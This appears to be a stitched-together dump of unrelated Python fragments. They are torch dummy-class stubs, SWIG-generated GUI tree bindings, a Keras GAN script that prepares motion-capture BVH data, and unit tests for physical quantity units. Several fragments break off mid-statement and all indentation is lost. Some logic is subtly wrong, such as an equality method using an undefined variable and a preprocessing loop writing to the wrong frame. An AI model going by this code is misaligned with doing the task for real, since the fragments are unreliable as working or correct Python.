class ViltLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisionEncoderDecoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisionTextDualEncoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
VISUAL_BERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class VisualBertForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisualBertForPreTraining(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisualBertForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, | |
height):
return _gui.GuiTree_set_line_height(self, height)
def refresh(self):
return _gui.GuiTree_refresh(self)
def show(self):
return _gui.GuiTree_show(self)
def draw(self, dc):
return _gui.GuiTree_draw(self, dc)
def set_size(self, x, y, w, h):
return _gui.GuiTree_set_size(self, x, y, w, h)
def resize(self, x, y, w, h):
return _gui.GuiTree_resize(self, x, y, w, h)
def process_event(self, event_id):
return _gui.GuiTree_process_event(self, event_id)
def is_active(self):
return _gui.GuiTree_is_active(self)
def get_last_event_item(self):
return _gui.GuiTree_get_last_event_item(self)
def get_drag_over_item(self):
return _gui.GuiTree_get_drag_over_item(self)
def on_vscroll(self, sender, event, data):
return _gui.GuiTree_on_vscroll(self, sender, event, data)
def get_background_color(self):
return _gui.GuiTree_get_background_color(self)
def set_background_color(self, *args):
return _gui.GuiTree_set_background_color(self, *args)
def set_border_style(self, style):
return _gui.GuiTree_set_border_style(self, style)
def get_border_style(self):
return _gui.GuiTree_get_border_style(self)
def get_border_color(self):
return _gui.GuiTree_get_border_color(self)
def set_border_color(self, *args):
return _gui.GuiTree_set_border_color(self, *args)
def set_shaded_entries(self, flag):
return _gui.GuiTree_set_shaded_entries(self, flag)
def is_shaded_entries(self):
return _gui.GuiTree_is_shaded_entries(self)
def enable_drag_and_drop(self, flag, enable_first=True, enable_last=True):
return _gui.GuiTree_enable_drag_and_drop(self, flag, enable_first, enable_last)
def is_drag_and_drop_enabled(self):
return _gui.GuiTree_is_drag_and_drop_enabled(self)
def enable_item_delete(self, flag):
return _gui.GuiTree_enable_item_delete(self, flag)
def is_item_delete_enabled(self):
return _gui.GuiTree_is_item_delete_enabled(self)
def enable_multi_selection(self, flag):
return _gui.GuiTree_enable_multi_selection(self, flag)
def is_multi_selection_enabled(self):
return _gui.GuiTree_is_multi_selection_enabled(self)
def destroy_selected_items(self):
return _gui.GuiTree_destroy_selected_items(self)
def get_selection(self):
return _gui.GuiTree_get_selection(self)
def set_selection(self, new_selection, raise_event=False):
return _gui.GuiTree_set_selection(self, new_selection, raise_event)
def get_preselection(self):
return _gui.GuiTree_get_preselection(self)
def set_preselection(self, new_preselection):
return _gui.GuiTree_set_preselection(self, new_preselection)
def get_highlighted_items(self):
return _gui.GuiTree_get_highlighted_items(self)
def highlight_item(self, item, value):
return _gui.GuiTree_highlight_item(self, item, value)
def select_all(self):
return _gui.GuiTree_select_all(self)
def deselect_all(self, *args):
return _gui.GuiTree_deselect_all(self, *args)
def show_item(self, item):
return _gui.GuiTree_show_item(self, item)
def select_previous_item(self, item):
return _gui.GuiTree_select_previous_item(self, item)
def select_next_item(self, item):
return _gui.GuiTree_select_next_item(self, item)
def get_first_item(self):
return _gui.GuiTree_get_first_item(self)
def get_last_item(self, visible):
return _gui.GuiTree_get_last_item(self, visible)
def clear_preselection(self):
return _gui.GuiTree_clear_preselection(self)
def clear_highlighted_items(self):
return _gui.GuiTree_clear_highlighted_items(self)
def remove_all(self):
return _gui.GuiTree_remove_all(self)
if _newclass:
scroll_while_drag = staticmethod(_gui.GuiTree_scroll_while_drag)
else:
scroll_while_drag = _gui.GuiTree_scroll_while_drag
def on_item_activate(self, item):
return _gui.GuiTree_on_item_activate(self, item)
def get_icon_size(self):
return _gui.GuiTree_get_icon_size(self)
def set_icon_size(self, size):
return _gui.GuiTree_set_icon_size(self, size)
def preselect_item(self, item):
return _gui.GuiTree_preselect_item(self, item)
if _newclass:
class_info = staticmethod(_gui.GuiTree_class_info)
else:
class_info = _gui.GuiTree_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTree____class_destructor__)
else:
___class_destructor__ = _gui.GuiTree____class_destructor__
def get_class_info(self):
return _gui.GuiTree_get_class_info(self)
def __gui_destroy__(self):
return _gui.GuiTree___gui_destroy__(self)
def __collect__(self):
return _gui.GuiTree___collect__(self)
def __uncollect__(self):
return _gui.GuiTree___uncollect__(self)
def is_created_by_python(self):
if hasattr(self, '__pycreated__'):
return self.__pycreated__
else: return False
def destroy(self):
if self.is_created_by_python():
self.__disown__()
self.__gui_destroy__()
self.__uncollect__()
def __del__(self):
if not self.is_created_by_python(): return
if self.is_shown():
self.hide()
if self.is_destroyed():
if self.thisown: self.__disown__()
else: self.destroy()
def __disown__(self):
self.this.disown()
_gui.disown_GuiTree(self)
return weakref_proxy(self)
GuiTree_swigregister = _gui.GuiTree_swigregister
GuiTree_swigregister(GuiTree)
EVT_ID_TREE_ITEM_ACTIVATE = cvar.EVT_ID_TREE_ITEM_ACTIVATE
EVT_ID_TREE_ITEM_SELECT = cvar.EVT_ID_TREE_ITEM_SELECT
EVT_ID_TREE_ITEM_DESELECT = cvar.EVT_ID_TREE_ITEM_DESELECT
EVT_ID_TREE_ITEM_EXPAND = cvar.EVT_ID_TREE_ITEM_EXPAND
EVT_ID_TREE_ITEM_COLLAPSE = cvar.EVT_ID_TREE_ITEM_COLLAPSE
EVT_ID_TREE_SELECTION_CHANGED = cvar.EVT_ID_TREE_SELECTION_CHANGED
EVT_ID_TREE_SELECTION_REMOVE = cvar.EVT_ID_TREE_SELECTION_REMOVE
EVT_ID_TREE_SELECTION_DRAG = cvar.EVT_ID_TREE_SELECTION_DRAG
EVT_ID_TREE_SELECTION_DROP = cvar.EVT_ID_TREE_SELECTION_DROP
EVT_ID_TREE_ITEM_RENAME = cvar.EVT_ID_TREE_ITEM_RENAME
EVT_ID_TREE_NAVIGATE_UP = cvar.EVT_ID_TREE_NAVIGATE_UP
EVT_ID_TREE_NAVIGATE_DOWN = cvar.EVT_ID_TREE_NAVIGATE_DOWN
EVT_ID_TREE_NAVIGATE_LEFT = cvar.EVT_ID_TREE_NAVIGATE_LEFT
EVT_ID_TREE_NAVIGATE_RIGHT = cvar.EVT_ID_TREE_NAVIGATE_RIGHT
def GuiTree_scroll_while_drag(data):
return _gui.GuiTree_scroll_while_drag(data)
GuiTree_scroll_while_drag = _gui.GuiTree_scroll_while_drag
def GuiTree_class_info():
return _gui.GuiTree_class_info()
GuiTree_class_info = _gui.GuiTree_class_info
def GuiTree____class_destructor__(instance, is_array):
return _gui.GuiTree____class_destructor__(instance, is_array)
GuiTree____class_destructor__ = _gui.GuiTree____class_destructor__
class GuiTreeBasicArray(base.CoreBaseType):
__swig_setmethods__ = {}
for _s in [base.CoreBaseType]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeBasicArray, name, value)
__swig_getmethods__ = {}
for _s in [base.CoreBaseType]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeBasicArray, name)
__repr__ = _swig_repr
INVALID_INDEX = _gui.GuiTreeBasicArray_INVALID_INDEX
def __init__(self, *args):
this = _gui.new_GuiTreeBasicArray(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _gui.delete_GuiTreeBasicArray
__del__ = lambda self: None
def get_count(self):
return _gui.GuiTreeBasicArray_get_count(self)
def get_item(self, index):
return _gui.GuiTreeBasicArray_get_item(self, index)
def set_item(self, index, item):
return _gui.GuiTreeBasicArray_set_item(self, index, item)
def front(self):
return _gui.GuiTreeBasicArray_front(self)
def back(self):
return _gui.GuiTreeBasicArray_back(self)
def exists(self, item):
return _gui.GuiTreeBasicArray_exists(self, item)
def get_index(self, item):
return _gui.GuiTreeBasicArray_get_index(self, item)
def sub(self, index, count):
return _gui.GuiTreeBasicArray_sub(self, index, count)
def get_memory_size(self):
return _gui.GuiTreeBasicArray_get_memory_size(self)
def begin(self, *args):
return _gui.GuiTreeBasicArray_begin(self, *args)
def end(self, *args):
return _gui.GuiTreeBasicArray_end(self, *args)
def get_class_info(self):
return _gui.GuiTreeBasicArray_get_class_info(self)
if _newclass:
class_info = staticmethod(_gui.GuiTreeBasicArray_class_info)
else:
class_info = _gui.GuiTreeBasicArray_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTreeBasicArray____class_destructor__)
else:
___class_destructor__ = _gui.GuiTreeBasicArray____class_destructor__
def __setitem__(self, index, value):
return _gui.GuiTreeBasicArray___setitem__(self, index, value)
def __len__(self):
return _gui.GuiTreeBasicArray___len__(self)
def __getitem__(self, index):
if (index < self.get_count()):
return self.get_item(index)
else:
raise IndexError("The index (" + str(index) + ") is out of range")
def __nonzero__(self): return True
GuiTreeBasicArray_swigregister = _gui.GuiTreeBasicArray_swigregister
GuiTreeBasicArray_swigregister(GuiTreeBasicArray)
def GuiTreeBasicArray_class_info():
return _gui.GuiTreeBasicArray_class_info()
GuiTreeBasicArray_class_info = _gui.GuiTreeBasicArray_class_info
def GuiTreeBasicArray____class_destructor__(instance, is_array):
return _gui.GuiTreeBasicArray____class_destructor__(instance, is_array)
GuiTreeBasicArray____class_destructor__ = _gui.GuiTreeBasicArray____class_destructor__
class GuiTreeArray(GuiTreeBasicArray):
__swig_setmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeArray, name, value)
__swig_getmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeArray, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _gui.new_GuiTreeArray(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _gui.delete_GuiTreeArray
__del__ = lambda self: None
def append(self, *args):
return _gui.GuiTreeArray_append(self, *args)
def get_count(self):
return _gui.GuiTreeArray_get_count(self)
def remove_all(self):
return _gui.GuiTreeArray_remove_all(self)
def resize(self, *args):
return _gui.GuiTreeArray_resize(self, *args)
def copy_from(self, *args):
return _gui.GuiTreeArray_copy_from(self, *args)
def copy_to(self, dest):
return _gui.GuiTreeArray_copy_to(self, dest)
def get_list(self, list):
return _gui.GuiTreeArray_get_list(self, list)
def set_list(self, list):
return _gui.GuiTreeArray_set_list(self, list)
def get_memory_size(self):
return _gui.GuiTreeArray_get_memory_size(self)
def get_class_info(self):
return _gui.GuiTreeArray_get_class_info(self)
if _newclass:
class_info = staticmethod(_gui.GuiTreeArray_class_info)
else:
class_info = _gui.GuiTreeArray_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTreeArray____class_destructor__)
else:
___class_destructor__ = _gui.GuiTreeArray____class_destructor__
GuiTreeArray_swigregister = _gui.GuiTreeArray_swigregister
GuiTreeArray_swigregister(GuiTreeArray)
def GuiTreeArray_class_info():
return _gui.GuiTreeArray_class_info()
GuiTreeArray_class_info = _gui.GuiTreeArray_class_info
def GuiTreeArray____class_destructor__(instance, is_array):
return _gui.GuiTreeArray____class_destructor__(instance, is_array)
GuiTreeArray____class_destructor__ = _gui.GuiTreeArray____class_destructor__
class GuiTreeVector(GuiTreeBasicArray):
__swig_setmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeVector, name, value)
__swig_getmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeVector, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _gui.new_GuiTreeVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _gui.delete_GuiTreeVector
__del__ = lambda self: None
def append(self, *args):
return _gui.GuiTreeVector_append(self, *args)
def add(self, element):
return _gui.GuiTreeVector_add(self, element)
def insert(self, element, index):
return _gui.GuiTreeVector_insert(self, element, index)
def remove_last(self):
return _gui.GuiTreeVector_remove_last(self)
def empty(self):
return _gui.GuiTreeVector_empty(self)
def remove_all(self):
return _gui.GuiTreeVector_remove_all(self)
def clear(self, *args):
return _gui.GuiTreeVector_clear(self, *args)
def remove(self, *args):
return _gui.GuiTreeVector_remove(self, *args)
def is_empty(self):
return _gui.GuiTreeVector_is_empty(self)
def remove_item(self, item, preserve_order):
return _gui.GuiTreeVector_remove_item(self, item, preserve_order)
def remove_items(self, item):
return _gui.GuiTreeVector_remove_items(self, item)
def get_count(self):
return _gui.GuiTreeVector_get_count(self)
def get_capacity(self):
return _gui.GuiTreeVector_get_capacity(self)
def set_count(self, *args):
return _gui.GuiTreeVector_set_count(self, *args)
def set_capacity(self, *args):
return _gui.GuiTreeVector_set_capacity(self, *args)
def refit(self):
return _gui.GuiTreeVector_refit(self)
def swap(self, swap_v1, swap_v2):
return _gui.GuiTreeVector_swap(self, swap_v1, swap_v2)
def resize(self, *args):
return _gui.GuiTreeVector_resize(self, *args)
def reserve(self, *args):
return _gui.GuiTreeVector_reserve(self, *args)
def copy_from(self, *args):
return _gui.GuiTreeVector_copy_from(self, *args)
def copy_to(self, dest):
return _gui.GuiTreeVector_copy_to(self, dest)
def get_list(self, list):
return _gui.GuiTreeVector_get_list(self, list)
def set_list(self, list):
return _gui.GuiTreeVector_set_list(self, list)
def get_array(self, array):
return _gui.GuiTreeVector_get_array(self, array)
def set_array(self, array):
return _gui.GuiTreeVector_set_array(self, array)
def move(self, arg2, to):
return _gui.GuiTreeVector_move(self, arg2, to)
def item(self, index):
return _gui.GuiTreeVector_item(self, index)
def get_memory_size(self):
return _gui.GuiTreeVector_get_memory_size(self)
def get_class_info(self):
return _gui.GuiTreeVector_get_class_info(self)
if _newclass:
class_info = staticmethod(_gui.GuiTreeVector_class_info)
else:
class_info = _gui.GuiTreeVector_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTreeVector____class_destructor__)
else:
___class_destructor__ = _gui.GuiTreeVector____class_destructor__
GuiTreeVector_swigregister = _gui.GuiTreeVector_swigregister
GuiTreeVector_swigregister(GuiTreeVector)
def GuiTreeVector_class_info():
return _gui.GuiTreeVector_class_info()
GuiTreeVector_class_info = _gui.GuiTreeVector_class_info
def GuiTreeVector____class_destructor__(instance, is_array):
return _gui.GuiTreeVector____class_destructor__(instance, is_array)
GuiTreeVector____class_destructor__ = _gui.GuiTreeVector____class_destructor__
class GuiTreeSet(base.CoreBaseObject):
__swig_setmethods__ = {}
for _s in [base.CoreBaseObject]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeSet, name, value)
__swig_getmethods__ = {}
for _s in [base.CoreBaseObject]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeSet, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _gui.new_GuiTreeSet(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def get_count(self):
return _gui.GuiTreeSet_get_count(self)
def exists(self, *args):
return _gui.GuiTreeSet_exists(self, *args)
def is_empty(self):
return _gui.GuiTreeSet_is_empty(self)
def is_included(self, set):
return _gui.GuiTreeSet_is_included(self, set)
def get_items(self):
return _gui.GuiTreeSet_get_items(self)
def get_item(self, index):
return _gui.GuiTreeSet_get_item(self, index)
def back(self, *args):
return _gui.GuiTreeSet_back(self, *args)
def get_array(self, array):
return _gui.GuiTreeSet_get_array(self, array)
def get_list(self, list):
return _gui.GuiTreeSet_get_list(self, list)
def get_vector(self, vector):
return _gui.GuiTreeSet_get_vector(self, vector)
def to_array(self):
return _gui.GuiTreeSet_to_array(self)
def add(self, *args):
return _gui.GuiTreeSet_add(self, *args)
def remove(self, index):
return _gui.GuiTreeSet_remove(self, index)
def remove_item(self, item):
return _gui.GuiTreeSet_remove_item(self, item)
def remove_set(self, set):
return _gui.GuiTreeSet_remove_set(self, set)
def remove_all(self):
return _gui.GuiTreeSet_remove_all(self)
def toggle(self, item):
return _gui.GuiTreeSet_toggle(self, item)
def unite(self, set):
return _gui.GuiTreeSet_unite(self, set)
def intersect(self, set):
return _gui.GuiTreeSet_intersect(self, set)
def __eq__(self, set):
if not isinstance(obj, type(self)):
return False
return _gui.GuiTreeSet___eq__(self, set)
def __ne__(self, set):
return _gui.GuiTreeSet___ne__(self, set)
def begin(self, *args):
return _gui.GuiTreeSet_begin(self, *args)
def end(self, *args):
return _gui.GuiTreeSet_end(self, *args)
if _newclass:
get_linear_search_threshold = staticmethod(_gui.GuiTreeSet_get_linear_search_threshold)
else:
get_linear_search_threshold = _gui.GuiTreeSet_get_linear_search_threshold
def get_memory_size(self):
return _gui.GuiTreeSet_get_memory_size(self)
def __setitem__(self, index, value):
return _gui.GuiTreeSet___setitem__(self, index, value)
def __len__(self):
return _gui.GuiTreeSet___len__(self)
def __getitem__(self, index):
if (index < self.get_count()):
return self.get_item(index)
else:
raise IndexError("The index (" + str(index) + ") is out of range")
def __nonzero__(self): return True
__swig_destroy__ = _gui.delete_GuiTreeSet
__del__ = lambda self: None
GuiTreeSet_swigregister = _gui.GuiTreeSet_swigregister
GuiTreeSet_swigregister(GuiTreeSet)
def GuiTreeSet_get_linear_search_threshold():
return _gui.GuiTreeSet_get_linear_search_threshold()
GuiTreeSet_get_linear_search_threshold = _gui.GuiTreeSet_get_linear_search_threshold
class GuiTreeItem(GuiWidget):
__swig_setmethods__ = {}
for _s in [GuiWidget]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeItem, name, value)
__swig_getmethods__ = {}
for _s in [GuiWidget]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda | |
<reponame>EtienneFrigo/AnimGAN
#Loading Libraries
from __future__ import print_function
import argparse
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
from PIL import Image
import math
import random
from keras.models import Sequential
from keras.layers import Dense, Reshape, Dropout, LSTM, Embedding, TimeDistributed, Bidirectional
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.core import Activation, Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D, MaxPooling2D, UpSampling2D
from keras.optimizers import SGD, Adam, RMSprop
from keras.datasets import mnist
import BVH as BVH
import Animation as Animation
from Quaternions import Quaternions
from keras.utils.generic_utils import Progbar
#Parameters
RUN_ID = "1"
DIR = '/home/dl-box/lab/GANs/Movement_GAN/' #working directory
NUM_EPOCHS = 1000
BATCH_SIZE = 64
DURATION = 3 #seconds
FRAMERATE = 1/12 #should be the fraction of a multiple of 12 (otherwise, may get some problem during the pre-processing)
NB_FRAMES = int(DURATION / FRAMERATE)
NOISE_SHAPE = (10,10) #shape of the noise use as input for the generator
NAMES = ['Hips', 'Chest', 'Chest2', 'Chest3', 'Chest4', 'Neck', 'Head', 'RightCollar', 'RightShoulder', 'RightElbow',
'RightWrist', 'LeftCollar', 'LeftShoulder', 'LeftElbow', 'LeftWrist', 'RightHip', 'RightKnee', 'RightAnkle',
'RightToe', 'LeftHip', 'LeftKnee', 'LeftAnkle', 'LeftToe'] #names of the 3Dmodel joints
NB_JOINTS = len(NAMES) #number of joints
# use specific GPU
GPU = "1"
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = GPU
#create the folder to the low resolution data
if not os.path.exists("lowFPS_"+str(RUN_ID)+"_"+str(DURATION)+"s_"+str(1/FRAMERATE)+"fps"):
os.makedirs("lowFPS_"+str(RUN_ID)+"_"+str(DURATION)+"s_"+str(1/FRAMERATE)+"fps")
# create the folder to save the samples
if not os.path.exists("motion_samples_dir"+RUN_ID):
os.makedirs("motion_samples_dir"+RUN_ID)
# create the folder to save the predictions
if not os.path.exists("motion_pred_dir"+RUN_ID):
os.makedirs("motion_pred_dir"+RUN_ID)
def mirror_rotations(rotations):
"""give the mirror image of a rotation matrix (np array)"""
F = rotations.shape[0] #number of frames
J = rotations.shape[1] #number of joints
result = rotations.copy()
modif = np.array([1,1,-1,-1]) #to get the mirror image of Quaternions, you can reverse the last parameters (empirical)
for f in range(F):
for j in range(0,7):# mirror the spine and head
rotations[f][j] *= modif
#mirror Collars
temp = rotations[f][7]
result[f][7]=rotations[f][11]*modif
result[f][11]=temp*modif
#mirror Shoulders
temp = rotations[f][8]
result[f][8]=rotations[f][12]*modif
result[f][12]=temp*modif
#mirror Elbow
temp = rotations[f][9]
result[f][9]=rotations[f][13]*modif
result[f][13]=temp*modif
#mirror Wrists
temp = rotations[f][10]
result[f][10]=rotations[f][14]*modif
result[f][14]=temp*modif
#mirror Hips
temp = rotations[f][15]
result[f][15]=rotations[f][19]*modif
result[f][19]=temp*modif
#mirror Knees
temp = rotations[f][16]
result[f][16]=rotations[f][20]*modif
result[f][20]=temp*modif
#mirror Ankles
temp = rotations[f][17]
result[f][17]=rotations[f][21]*modif
result[f][21]=temp*modif
#mirror Toes
temp = rotations[f][18]
result[f][18]=rotations[f][22]*modif
result[f][22]=temp*modif
return result
def add_noise(rotations, level):
"""adds random noise to a rotation matrix np array. The noise will have a value in the range [-level ; level]"""
S = rotations.shape[0] #size of the array
F = rotations.shape[1] #number of frames
J = rotations.shape[2] #number of joints
result = rotations.copy()
for s in range(S):
for f in range(F):
for j in range(J):
for q in range(4):
result[s][f][j][q]+=np.random.uniform(-level,level)
return result
def make_animation(generated_rots, original_anim):
"""make a proper animation object from rotations by using a model from the real data for static parameters (orients, offsets ...) """
generated_anim = (Animation.Animation(Quaternions(generated_rots),
original_anim.positions,
original_anim.orients,
original_anim.offsets,
original_anim.parents
))
return generated_anim
def make_fake_list(nb_motions, nb_frames, nb_joints):
"""build a totally random motion"""
rots = np.array([[[[0.0]*4]*nb_joints]*nb_frames]*nb_motions)
for s in range (nb_motions):
for f in range(nb_frames):
for j in range(nb_joints):
for q in range (4):
rots[s][f][j][q] = np.random.uniform(-1,1)
return rots
def make_odd(rots_data, oddity):
"""adds some unrealistic features to a rotations matrix data by modifying a random body part (spine, left arm ...).
These features can be parametrized. Oddity allows to choose in which manner they will be change:
- random : add noise an arm, a leg or the spine
- inverse : reverse the rotations
- static : set to default rotations"""
S = rots_data.shape[0] # number of elements in the data set
F = rots_data.shape[1] # number of frame per element
J = rots_data.shape[2] # number of joint per frame
result = rots_data.copy()
if oddity == 'random':
for s in range(S):
R = random.randint(0,4)
if R == 0:#spines
modif = [0,1,2,3,4,5]
if R == 1:#right arm
modif = [6,8,9,10]
if R == 2:#left arm
modif = [11,12,13,14]
if R == 3:#right lieg
modif = [15,16,17,18]
if R == 4:#left leg
modif = [19,20,21,22]
for f in range(F):
for j in modif:
for q in range(4):
result[s][f][j][q]+=np.random.uniform(-0.3,0.3)
if oddity == 'inverse':
for s in range(S):
R = random.randint(0,4)
if R == 0:#spines
modif = [0,1,2,3,4,5]
if R == 1:#right arm
modif = [6,8,9,10]
if R == 2:#left arm
modif = [11,12,13,14]
if R == 3:#right lieg
modif = [15,16,17,18]
if R == 4:#left leg
modif = [19,20,21,22]
for f in range(F):
for j in modif:
for q in range(1,4):
result[s][f][j][q]=-result[s][f][j][q]
if oddity == 'static':
for s in range(S):
R = random.randint(0,4)
if R == 0:#spines
modif = [0,1,2,3,4,5]
if R == 1:#right arm
modif = [6,8,9,10]
if R == 2:#left arm
modif = [11,12,13,14]
if R == 3:#right lieg
modif = [15,16,17,18]
if R == 4:#left leg
modif = [19,20,21,22]
for f in range(F):
for j in modif:
for q in range(4):
result[s][f][j][q]=0.0000001
return result
def rotations_preprocess(rotations_batch, epsilon):
"""take an np.array of rotations and replace the zeros (that can cause problems with Quaternions) by a very low value.
This is suppose to avoid errors when feeding the generated postures to the generator"""
S = rotations_batch.shape[0] # number of elements in the data set
F = rotations_batch.shape[1] # number of frame per element
J = rotations_batch.shape[2] # number of joint per frame
result = rotations_batch
for s in range(S):
for f in range(F):
for j in range(J):
for i in range(4):
if abs(result[s][f][j][i]) <= epsilon :
result[s][0][j][i] = epsilon
return result
def motion_postprocess(motion):
"""put a the generated gesture in the same orientation before displaying it"""
F = motion.shape[0] # number of elements in the data set
J = motion.shape[1] # number of frame per element
result = motion.copy()
for f in range(0,F):
result[f][0] = np.array([0.9987335, -0.05031297, 0.00000001, 0.00000001])
return result
def prepare_data(directory, duration, framerate, shift):
"""prepare the data to be feed in the network
directory : name of the folder containing the motion_data. directory should be in the same folder as the algorithm.string
duration : duration (seconds) we want the data elements to be. float
framerate : fps we want the data to be. float
shift : when getting multiple samples from a file, indicate the time in between (if shift < duration : overlaping)
Every elements in the data is given a same duration and framerate"""
#Getting all the paths to the bvh files of the directory
print("loading bvh file ...", end="\r")
bvh_paths = []
current_dir = os.getcwd()
motion_dir = os.path.join(current_dir, directory)
for each in os.listdir(motion_dir):
bvh_paths.append(os.path.join(motion_dir, each))
#Loading the bvh files and save them as file of a smaller duration
motion_data = []
for i in bvh_paths :
if not(i==DIR+'motionDataSet_bvhFormat/.ipynb_checkpoints'): #some issues with a non existing file
try:
new_data = BVH.load(filename=i)
motion_data.append(BVH.load(filename=i))
except ValueError :
print ("on line",i)
print("loading bvh files : DONE",end="\r")
#Changing the animations' framerate by sampling the rotations and positions of the files
lowFPS_data = []
for m in motion_data :
file_duration = m[0].rotations.shape[0]*m[2] #duration of the file (s)
frame_skip = int(framerate/m[2]) #number of frame to skip to get the wanted duration
end_frame = int(duration/m[2]) #frame to end one sample
#we need to count how many samples we can extract from a single file to prceed the multi sampling
nb_samples = 0
r = 0
while r + duration < file_duration:
nb_samples += 1
r += shift
if(nb_samples > 0):
for sample in range(nb_samples):
rots = []
poss = []
for k in range(sample*(shift*int(1/m[2])), sample*(shift*int(1/m[2]))+end_frame, frame_skip) :
rots.append(m[0].rotations[k])
poss.append(m[0].positions[k])
new_rotations = Quaternions(np.array(rots))
new_positions = np.array(poss)
new_positions = np.array([[[0]*3]*23]*36)
if new_rotations.shape == (36, 23):
new_anim = Animation.Animation(new_rotations, new_positions, m[0].orients, m[0].offsets, m[0].parents)
lowFPS_tuple = (new_anim, m[1], framerate)
lowFPS_data.append(lowFPS_tuple)
print("lowering framerate : DONE", end="\r")
return np.array(lowFPS_data)
#preparing data of 3 seconds long animations at 12 fps ; this step can take a few minutes depending on the datasetlow size
lowFPS_data = prepare_data('motionDataSet_bvhFormat', DURATION, FRAMERATE, 1)
print(f"lowFPS_{RUN_ID}_{DURATION}s_{1/FRAMERATE}fps")
print("preparing low_fps_data : DONE",end="\r")
#saving lowDPS-data in directory
for i in range (len(lowFPS_data)) :
BVH.save(filename=DIR+"lowFPS_"+str(RUN_ID)+"_"+str(DURATION)+"s_"+str(1/FRAMERATE)+"fps/data_LFPS_"+str(i)+".bvh",
anim=lowFPS_data[i][0],
names=lowFPS_data[i][1],
frametime=lowFPS_data[i][2]
)
#extracting the roations from the lowFPS_data
print("extracting rotations ...",end="\r")
rots = []
for i in lowFPS_data :
insert = np.array(i[0].rotations)
rots.append(insert)
rots.append(mirror_rotations(insert)) # add the mirrored rotations to get more data
rots_data | |
try:
q = quantity.HeatCapacity(1.0,"kJ/K")
self.fail('Allowed invalid unit type "kJ/K".')
except quantity.QuantityError:
pass
def test_kJpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of kJ/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"kJ/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1000., delta=1e-6)
self.assertEqual(q.units, "kJ/(mol*K)")
def test_kcalperK(self):
"""
Test the creation of a heat capacity quantity with units of kcal/K.
"""
try:
q = quantity.HeatCapacity(1.0,"kcal/K")
self.fail('Allowed invalid unit type "kcal/K".')
except quantity.QuantityError:
pass
def test_kcalpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of kcal/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"kcal/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 4184., delta=1e-6)
self.assertEqual(q.units, "kcal/(mol*K)")
################################################################################
class TestInertia(unittest.TestCase):
"""
Contains unit tests of the Inertia unit type object.
"""
def test_kg_m2(self):
"""
Test the creation of a moment of inertia quantity with units of kg*m^2.
"""
q = quantity.Inertia(1.0,"kg*m^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "kg*m^2")
def test_amu_angstrom2(self):
"""
Test the creation of a moment of inertia quantity with units of amu*angstrom^2.
"""
q = quantity.Inertia(1.0,"amu*angstrom^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*constants.Na*1e23, 1.0, delta=1e-6)
